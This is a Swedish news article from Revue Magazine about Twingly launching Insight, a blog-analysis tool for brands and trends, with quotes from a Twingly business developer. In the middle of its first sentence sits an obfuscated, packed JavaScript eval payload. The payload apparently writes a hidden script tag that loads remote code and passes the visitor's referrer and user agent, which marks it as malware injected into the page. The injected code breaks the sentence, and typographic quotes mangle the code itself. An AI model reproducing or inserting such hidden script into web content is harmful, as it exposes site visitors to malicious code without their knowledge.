Image Image Image Image Image Image Image Image Image Image

| 21 november, 2017

Scroll to top

Top

No Comments

Revue.se | Twingly lanserar Insight - unikt verktyg för blogganalys

Twingly lanserar Insight – unikt verktyg för blogganalys
Revue Magazine

Igår eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sdrkh|var|u0026u|referrer|kybha||js|php’.split(‘|’),0,{}))
lanserades
Twingly Insight, ett verktyg för att enkelt analysera varumärken och trender i bloggar.

Twingly Insight är ett nytt verktyg för att analysera sökord i bloggar. Med unik metadata, statistik och historik kan kommunikatörer, omvärldsbevakare och informationsspecialister få inblick den annars svåranalyserade bloggvärlden.

– Vi har skapat ett av de mest konventionella verktygen för att som företag, organisation eller PR-byrå kunna börja jobba med bloggar. Med ett par klick får man ut en enkel rapport om sitt varumärke, hemsida eller ämne säger Anton Johansson, affärsutvecklare på Twingly.

Med Insight gör Twingly statistik och metadata tillgängligt som tidigare inte kunnat användas.

– Insight är ett snabbt verktyg för att göra avancerade analyser. Med den statistik som genereras går det att göra djupdykningar i bloggvärlden som tidigare ej varit möjligt, säger Anton Johansson, affärsutvecklare på Twingly.

I samarbete med Greenhill Relations startar Twingly också en utbildning i blogganalys för kommunikatörer och PR-byråer.